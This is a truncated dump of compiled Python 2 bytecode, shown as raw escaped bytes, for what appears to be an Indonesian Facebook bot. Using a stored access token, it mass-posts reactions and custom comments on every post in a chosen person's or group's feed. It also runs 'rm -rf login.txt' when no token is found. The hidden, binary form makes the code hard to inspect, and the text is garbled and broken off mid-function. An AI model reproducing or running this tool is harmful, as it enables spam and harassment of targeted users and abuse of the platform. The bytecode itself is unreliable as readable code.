\n\x00k\x02\x00r\x97\x00d\x0b\x00a\x02\x00t\x03\x00\x83\x00\x00\x01nZ\x00|\x00\x00d\x0c\x00k\x02\x00r\xb3\x00d\r\x00a\x02\x00t\x03\x00\x83\x00\x00\x01n>\x00|\x00\x00d\x0e\x00k\x02\x00r\xcf\x00d\x0f\x00a\x02\x00t\x03\x00\x83\x00\x00\x01n"\x00|\x00\x00d\x10\x00k\x02\x00r\xe5\x00t\x04\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x00\x00S(\x11\x00\x00\x00Ns\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR\n\x00\x00\x00s\x16\x00\x00\x00\x1b[1;91m[!] Wrong inputR8\x00\x00\x00t\x04\x00\x00\x00LIKER9\x00\x00\x00t\x04\x00\x00\x00LOVERs\x00\x00\x00t\x03\x00\x00\x00WOWRt\x00\x00\x00t\x04\x00\x00\x00HAHAR\x81\x00\x00\x00t\x03\x00\x00\x00SADR\x82\x00\x00\x00t\x05\x00\x00\x00ANGRYR:\x00\x00\x00(\x05\x00\x00\x00R/\x00\x00\x00R\x1a\x01\x00\x00t\x04\x00\x00\x00tipet\x05\x00\x00\x00reactR\x11\x01\x00\x00(\x01\x00\x00\x00t\x04\x00\x00\x00aksi(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x1a\x01\x00\x00a\x07\x00\x00s4\x00\x00\x00\x00\x02\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\n\x02\x05\x01c\x00\x00\x00\x00\x07\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xa5\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHt\t\x00d\x07\x00\x83\x01\x00}\x01\x00t\t\x00d\x08\x00\x83\x01\x00}\x02\x00y\xed\x00t\n\x00j\x0b\x00d\t\x00|\x01\x00\x17d\n\x00\x17|\x02\x00\x17d\x0b\x00\x17|\x00\x00\x17\x83\x01\x00}\x03\x00t\x0c\x00j\r\x00|\x03\x00j\x0e\x00\x83\x01\x00}\x04\x00t\x0f\x00d\x0c\x00\x83\x01\x00\x01d\r\x00d\x0e\x00\x14GHxo\x00|\x04\x00d\x0f\x00\x19d\x10\x00\x19D]_\x00}\x05\x00|\x05\x00d\x11\x00\x19}\x06\x00t\x10\x00j\x11\x00|\x06\x00\x83\x01\x00\x01t\n\x00j\x12\x00d\t\x00|\x06\x00\x17d\x12\x00\x17t\x13\x00\x17d\x13\x00\x17|\x00\x00\x17\x83\x01\x00\x01d\x14\x00|\x06\x00d\x15\x00 j\x14\x00d\x16\x00d\x17\x00\x83\x02\x00\x17d\x18\x00\x17t\x13\x00\x17GHq\xe4\x00Wd\r\x00d\x0e\x00\x14GHd\x19\x00t\x15\x00t\x16\x00t\x10\x00\x83\x01\x00\x83\x01\x00\x17GHt\t\x00d\x1a\x00\x83\x01\x00\x01t\x17\x00\x83\x00\x00\x01Wn\'\x00\x04t\x18\x00k\n\x00r\xa0\x01\x01\x01\x01d\x1b\x00GHt\t\x00d\x1a\x00\x83\x01\x00\x01t\x17\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x1c\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s2\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID Target \x1b[1;91m:\x1b[1;97m s(\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m s\x1b\x00\x00\x00https://graph.facebook.com/s\x13\x00\x00\x00?fields=feed.limit(s\x0f\x00\x00\x00)&access_token=s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90t\x04\x00\x00\x00feedRl\x00\x00\x00Rj\x00\x00\x00s\x10\x00\x00\x00/reactions?type=s\x0e\x00\x00\x00&access_token=s\x0f\x00\x00\x00\x1b[1;92m[\x1b[1;97mi\n\x00\x00\x00s\x01\x00\x00\x00\nt\x01\x00\x00\x00 s\x14\x00\x00\x00... \x1b[1;92m] \x1b[1;97ms\x1f\x00\x00\x00\r\x1b[1;91m[+]\x1b[1;92m Done \x1b[1;97ms\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x17\x00\x00\x00\x1b[1;91m[!] ID not found(\x19\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R \x00\x00\x00t\x06\x00\x00\x00reaksiR\x94\x00\x00\x00Rh\x00\x00\x00R!\x01\x00\x00R\x16\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x11\x01\x00\x00R,\x00\x00\x00(\x07\x00\x00\x00R4\x00\x00\x00t\x03\x00\x00\x00idet\x05\x00\x00\x00limitt\x02\x00\x00\x00oht\x02\x00\x00\x00ahRm\x00\x00\x00Ro\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R"\x01\x00\x00\x7f\x07\x00\x00s<\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x0c\x01\x0c\x01\x03\x01#\x01\x12\x01\n\x01\t\x01\x15\x01\n\x01\r\x01!\x01%\x01\t\x01\x15\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xa5\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHd\x0c\x00GHd\r\x00GHd\x0e\x00GHt\t\x00\x83\x00\x00\x01d\x00\x00S(\x0f\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m1. \x1b[1;97mLikes*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m2. \x1b[1;97mLoves)\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m3. \x1b[1;97mWows*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m4. \x1b[1;97mHahas,\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m5. \x1b[1;97mSadBoys+\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m6. \x1b[1;97mAngrys*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;91m0.\x1b[1;97m Backs\x03\x00\x00\x00\xe2\x95\x91(\n\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00t\x0c\x00\x00\x00reactg_pilih(\x01\x00\x00\x00R4\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x13\x01\x00\x00\xa0\x07\x00\x00s&\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\xf5\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n\xca\x00|\x00\x00d\x04\x00k\x02\x00rC\x00d\x05\x00a\x02\x00t\x03\x00\x83\x00\x00\x01n\xae\x00|\x00\x00d\x06\x00k\x02\x00r_\x00d\x07\x00a\x02\x00t\x03\x00\x83\x00\x00\x01n\x92\x00|\x00\x00d\x08\x00k\x02\x00r{\x00d\t\x00a\x02\x00t\x03\x00\x83\x00\x00\x01nv\x00|\x00\x00d\n\x00k\x02\x00r\x97\x00d\x0b\x00a\x02\x00t\x03\x00\x83\x00\x00\x01nZ\x00|\x00\x00d\x0c\x00k\x02\x00r\xb3\x00d\r\x00a\x02\x00t\x03\x00\x83\x00\x00\x01n>\x00|\x00\x00d\x0e\x00k\x02\x00r\xcf\x00d\x0f\x00a\x02\x00t\x03\x00\x83\x00\x00\x01n"\x00|\x00\x00d\x10\x00k\x02\x00r\xe5\x00t\x04\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x00\x00S(\x11\x00\x00\x00Ns\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR\n\x00\x00\x00s\x16\x00\x00\x00\x1b[1;91m[!] Wrong inputR8\x00\x00\x00R\x1b\x01\x00\x00R9\x00\x00\x00R\x1c\x01\x00\x00Rs\x00\x00\x00R\x1d\x01\x00\x00Rt\x00\x00\x00R\x1e\x01\x00\x00R\x81\x00\x00\x00R\x1f\x01\x00\x00R\x82\x00\x00\x00R \x01\x00\x00R:\x00\x00\x00(\x05\x00\x00\x00R/\x00\x00\x00R+\x01\x00\x00R!\x01\x00\x00t\x06\x00\x00\x00reactgR\x11\x01\x00\x00(\x01\x00\x00\x00R#\x01\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R+\x01\x00\x00\xb5\x07\x00\x00s4\x00\x00\x00\x00\x02\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\n\x02\x05\x01c\x00\x00\x00\x00\t\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\r\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHt\t\x00d\x07\x00\x83\x01\x00}\x01\x00t\t\x00d\x08\x00\x83\x01\x00}\x02\x00y>\x00t\n\x00j\x0b\x00d\t\x00|\x01\x00\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00}\x03\x00t\x0c\x00j\r\x00|\x03\x00j\x0e\x00\x83\x01\x00}\x04\x00d\x0b\x00|\x04\x00d\x0c\x00\x19\x17GHWn\'\x00\x04t\x0f\x00k\n\x00r\xf1\x00\x01\x01\x01d\r\x00GHt\t\x00d\x0e\x00\x83\x01\x00\x01t\x10\x00\x83\x00\x00\x01n\x01\x00Xy\xed\x00t\n\x00j\x0b\x00d\x0f\x00|\x01\x00\x17d\x10\x00\x17|\x02\x00\x17d\x11\x00\x17|\x00\x00\x17\x83\x01\x00}\x05\x00t\x0c\x00j\r\x00|\x05\x00j\x0e\x00\x83\x01\x00}\x06\x00t\x11\x00d\x12\x00\x83\x01\x00\x01d\x13\x00d\x14\x00\x14GHxo\x00|\x06\x00d\x15\x00\x19d\x16\x00\x19D]_\x00}\x07\x00|\x07\x00d\x17\x00\x19}\x08\x00t\x12\x00j\x13\x00|\x08\x00\x83\x01\x00\x01t\n\x00j\x14\x00d\x18\x00|\x08\x00\x17d\x19\x00\x17t\x15\x00\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00\x01d\x1a\x00|\x08\x00d\x1b\x00 j\x16\x00d\x1c\x00d\x1d\x00\x83\x02\x00\x17d\x1e\x00\x17t\x15\x00\x17GHqL\x01Wd\x13\x00d\x14\x00\x14GHd\x1f\x00t\x17\x00t\x18\x00t\x12\x00\x83\x01\x00\x83\x01\x00\x17GHt\t\x00d\x0e\x00\x83\x01\x00\x01t\x19\x00\x83\x00\x00\x01Wn\'\x00\x04t\x0f\x00k\n\x00r\x08\x02\x01\x01\x01d \x00GHt\t\x00d\x0e\x00\x83\x01\x00\x01t\x19\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(!\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s1\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID Group \x1b[1;91m:\x1b[1;97m s(\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m s%\x00\x00\x00https://graph.facebook.com/group/?id=s\x0e\x00\x00\x00&access_token=s=\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom group \x1b[1;91m:\x1b[1;97m R0\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Group not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s \x00\x00\x00https://graph.facebook.com/v3.0/s\x13\x00\x00\x00?fields=feed.limit(s\x0f\x00\x00\x00)&access_token=s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90R$\x01\x00\x00Rl\x00\x00\x00Rj\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s\x10\x00\x00\x00/reactions?type=s\x0f\x00\x00\x00\x1b[1;92m[\x1b[1;97mi\n\x00\x00\x00s\x01\x00\x00\x00\nR%\x01\x00\x00s\x14\x00\x00\x00... \x1b[1;92m] \x1b[1;97ms\x1f\x00\x00\x00\r\x1b[1;91m[+]\x1b[1;92m Done \x1b[1;97ms\x17\x00\x00\x00\x1b[1;91m[!] ID not found(\x1a\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R\x13\x01\x00\x00R \x00\x00\x00t\n\x00\x00\x00reaksigrupR\x94\x00\x00\x00Rh\x00\x00\x00R!\x01\x00\x00R\x16\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x11\x01\x00\x00(\t\x00\x00\x00R4\x00\x00\x00R\'\x01\x00\x00R(\x01\x00\x00R\'\x00\x00\x00R\xa0\x00\x00\x00R)\x01\x00\x00R*\x01\x00\x00Rm\x00\x00\x00Ro\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R,\x01\x00\x00\xd3\x07\x00\x00sL\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x0c\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\x03\x01#\x01\x12\x01\n\x01\t\x01\x15\x01\n\x01\r\x01!\x01%\x01\t\x01\x15\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01c\x00\x00\x00\x00\x08\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xc4\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHt\t\x00d\x08\x00\x83\x01\x00}\x01\x00t\t\x00d\t\x00\x83\x01\x00}\x02\x00t\t\x00d\n\x00\x83\x01\x00}\x03\x00|\x02\x00j\n\x00d\x0b\x00d\x0c\x00\x83\x02\x00}\x02\x00y\xe9\x00t\x0b\x00j\x0c\x00d\r\x00|\x01\x00\x17d\x0e\x00\x17|\x03\x00\x17d\x0f\x00\x17|\x00\x00\x17\x83\x01\x00}\x04\x00t\r\x00j\x0e\x00|\x04\x00j\x0f\x00\x83\x01\x00}\x05\x00t\x10\x00d\x10\x00\x83\x01\x00\x01d\x11\x00d\x12\x00\x14GHxk\x00|\x05\x00d\x13\x00\x19d\x14\x00\x19D][\x00}\x06\x00|\x06\x00d\x15\x00\x19}\x07\x00t\x11\x00j\x12\x00|\x07\x00\x83\x01\x00\x01t\x0b\x00j\x13\x00d\r\x00|\x07\x00\x17d\x16\x00\x17|\x02\x00\x17d\x17\x00\x17|\x00\x00\x17\x83\x01\x00\x01d\x18\x00|\x02\x00d\x19\x00 j\n\x00d\x0c\x00d\x1a\x00\x83\x02\x00\x17d\x1b\x00\x17GHq\x07\x01Wd\x11\x00d\x12\x00\x14GHd\x1c\x00t\x14\x00t\x15\x00t\x11\x00\x83\x01\x00\x83\x01\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x16\x00\x83\x00\x00\x01Wn\'\x00\x04t\x17\x00k\n\x00r\xbf\x01\x01\x01\x01d\x1e\x00GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x16\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x1f\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s6\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m\'<>\' \x1b[1;92mfor new liness,\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m s*\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mComment \x1b[1;91m:\x1b[1;97m s(\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m s\x02\x00\x00\x00<>s\x01\x00\x00\x00\ns\x1b\x00\x00\x00https://graph.facebook.com/s\x13\x00\x00\x00?fields=feed.limit(s\x0f\x00\x00\x00)&access_token=s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90R$\x01\x00\x00Rl\x00\x00\x00Rj\x00\x00\x00s\x12\x00\x00\x00/comments?message=s\x0e\x00\x00\x00&access_token=s\x0f\x00\x00\x00\x1b[1;92m[\x1b[1;97mi\n\x00\x00\x00R%\x01\x00\x00s\x0c\x00\x00\x00... \x1b[1;92m]s\x1f\x00\x00\x00\r\x1b[1;91m[+]\x1b[1;92m Done \x1b[1;97ms\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x17\x00\x00\x00\x1b[1;91m[!] ID not found(\x18\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R\x16\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R \x00\x00\x00t\x05\x00\x00\x00komenR\x94\x00\x00\x00Rh\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x11\x01\x00\x00R,\x00\x00\x00(\x08\x00\x00\x00R4\x00\x00\x00R\'\x01\x00\x00t\x02\x00\x00\x00kmR(\x01\x00\x00R\xf1\x00\x00\x00Rm\x00\x00\x00R\xa2\x00\x00\x00t\x01\x00\x00\x00f(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x14\x01\x00\x00\xfc\x07\x00\x00sB\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x0c\x01\x0c\x01\x0c\x01\x12\x01\x03\x01#\x01\x12\x01\n\x01\t\x01\x15\x01\n\x01\r\x01!\x01!\x01\t\x01\x15\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01c\x00\x00\x00\x00\n\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s,\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHt\t\x00d\x08\x00\x83\x01\x00}\x01\x00t\t\x00d\t\x00\x83\x01\x00}\x02\x00t\t\x00d\n\x00\x83\x01\x00}\x03\x00|\x02\x00j\n\x00d\x0b\x00d\x0c\x00\x83\x02\x00}\x02\x00y>\x00t\x0b\x00j\x0c\x00d\r\x00|\x01\x00\x17d\x0e\x00\x17|\x00\x00\x17\x83\x01\x00}\x04\x00t\r\x00j\x0e\x00|\x04\x00j\x0f\x00\x83\x01\x00}\x05\x00d\x0f\x00|\x05\x00d\x10\x00\x19\x17GHWn\'\x00\x04t\x10\x00k\n\x00r\x14\x01\x01\x01\x01d\x11\x00GHt\t\x00d\x12\x00\x83\x01\x00\x01t\x11\x00\x83\x00\x00\x01n\x01\x00Xy\xe9\x00t\x0b\x00j\x0c\x00d\x13\x00|\x01\x00\x17d\x14\x00\x17|\x03\x00\x17d\x15\x00\x17|\x00\x00\x17\x83\x01\x00}\x06\x00t\r\x00j\x0e\x00|\x06\x00j\x0f\x00\x83\x01\x00}\x07\x00t\x12\x00d\x16\x00\x83\x01\x00\x01d\x17\x00d\x18\x00\x14GHxk\x00|\x07\x00d\x19\x00\x19d\x1a\x00\x19D][\x00}\x08\x00|\x08\x00d\x1b\x00\x19}\t\x00t\x13\x00j\x14\x00|\t\x00\x83\x01\x00\x01t\x0b\x00j\x15\x00d\x1c\x00|\t\x00\x17d\x1d\x00\x17|\x02\x00\x17d\x0e\x00\x17|\x00\x00\x17\x83\x01\x00\x01d\x1e\x00|\x02\x00d\x1f\x00 j\n\x00d\x0c\x00d \x00\x83\x02\x00\x17d!\x00\x17GHqo\x01Wd\x17\x00d\x18\x00\x14GHd"\x00t\x16\x00t\x17\x00t\x13\x00\x83\x01\x00\x83\x01\x00\x17GHt\t\x00d\x12\x00\x83\x01\x00\x01t\x11\x00\x83\x00\x00\x01Wn\'\x00\x04t\x10\x00k\n\x00r\'\x02\x01\x01\x01d#\x00GHt\t\x00d\x12\x00\x83\x01\x00\x01t\x11\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S($\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s6\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m\'<>\' \x1b[1;92mfor new liness,\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m s*\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mComment \x1b[1;91m:\x1b[1;97m s(\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m s\x02\x00\x00\x00<>s\x01\x00\x00\x00\ns%\x00\x00\x00https://graph.facebook.com/group/?id=s\x0e\x00\x00\x00&access_token=s=\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom group \x1b[1;91m:\x1b[1;97m R0\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Group not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s \x00\x00\x00https://graph.facebook.com/v3.0/s\x13\x00\x00\x00?fields=feed.limit(s\x0f\x00\x00\x00)&access_token=s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90R$\x01\x00\x00Rl\x00\x00\x00Rj\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s\x12\x00\x00\x00/comments?message=s\x0f\x00\x00\x00\x1b[1;92m[\x1b[1;97mi\n\x00\x00\x00R%\x01\x00\x00s\x0c\x00\x00\x00... \x1b[1;92m]s\x1f\x00\x00\x00\r\x1b[1;91m[+]\x1b[1;92m Done \x1b[1;97ms\x10\x00\x00\x00\x1b[1;91m[!] Error(\x18\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R\x16\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R\x11\x01\x00\x00R \x00\x00\x00t\t\x00\x00\x00komengrupR\x94\x00\x00\x00Rh\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00(\n\x00\x00\x00R4\x00\x00\x00R\'\x01\x00\x00R/\x01\x00\x00R(\x01\x00\x00R\'\x00\x00\x00R\xa0\x00\x00\x00R\xf1\x00\x00\x00Rm\x00\x00\x00R\xa2\x00\x00\x00R0\x01\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x15\x01\x00\x00 \x08\x00\x00sR\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x0c\x01\x0c\x01\x0c\x01\x12\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\x03\x01#\x01\x12\x01\n\x01\t\x01\x15\x01\n\x01\r\x01!\x01!\x01\t\x01\x15\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01c\x00\x00\x00\x00\x0c\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xf5\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01yH\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00t\x04\x00j\x05\x00d\x04\x00|\x00\x00\x17\x83\x01\x00}\x01\x00t\x06\x00j\x07\x00|\x01\x00j\x08\x00\x83\x01\x00}\x02\x00|\x02\x00d\x05\x00\x19}\x03\x00Wn7\x00\x04t\t\x00k\n\x00r\x8